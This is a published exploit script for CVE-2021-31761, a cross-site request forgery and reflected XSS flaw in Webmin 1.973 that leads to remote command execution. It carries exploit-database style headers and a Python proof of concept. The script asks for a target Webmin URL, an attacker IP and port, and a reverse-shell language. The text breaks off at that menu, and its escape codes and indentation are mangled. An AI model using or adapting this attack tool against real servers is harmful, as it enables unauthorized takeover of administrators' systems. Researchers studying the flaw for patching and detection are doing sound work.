Webmin version 1.973 cross site request forgery exploit that loads a reverse shell.
advisories | CVE-2021-31761
# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE: CVE-2021-31761
# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to
# get a Remote Command Execution (RCE) through the Webmin's running process
# feature
import time, subprocess,random,urllib.parse
print(''' 33[1;37m
__ __ _ ____ _ _________ _ _ _
| / | | | |___ | | |___ / _ | | | | | |
| / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |/| |/ _ / __| '_ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/__ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|___||___/_| |_|____/|_| (_|_) /________/|_|__,_|__, |___|_|_/
__/ |
|___/
33[1;m''')
for i in range(101):
print(
"r 33[1;36m [>] POC By 33[1;m 33[1;37mMesh3l 33[1;m 33[1;36m ( 33[1;m 33[1;37m@Mesh3l_911 33[1;m 33[1;36m ) & 33[1;m 33[1;37mZ0ldyck 33[1;m 33[1;36m ( 33[1;m 33[1;37m@electronicbots 33[1;m 33[1;36m ) 33[1;m {} 33[1;m".format(
i), " 33[1;36m% 33[1;m", end="")
time.sleep(0.02)
print("nn")
target = input(
" 33[1;36m n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > 33[1;m")
if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'
ip = input(" 33[1;36m n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > 33[1;m")
port = input(" 33[1;36m n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > 33[1;m")
ReverseShell = input
(''' 33[1;37m
n
1- Bash Reverse Shell n
2- PHP Reverse Shell n
3- Python Reverse Shell n
4- Perl Reverse Shell n
5- Ruby Reverse Shell n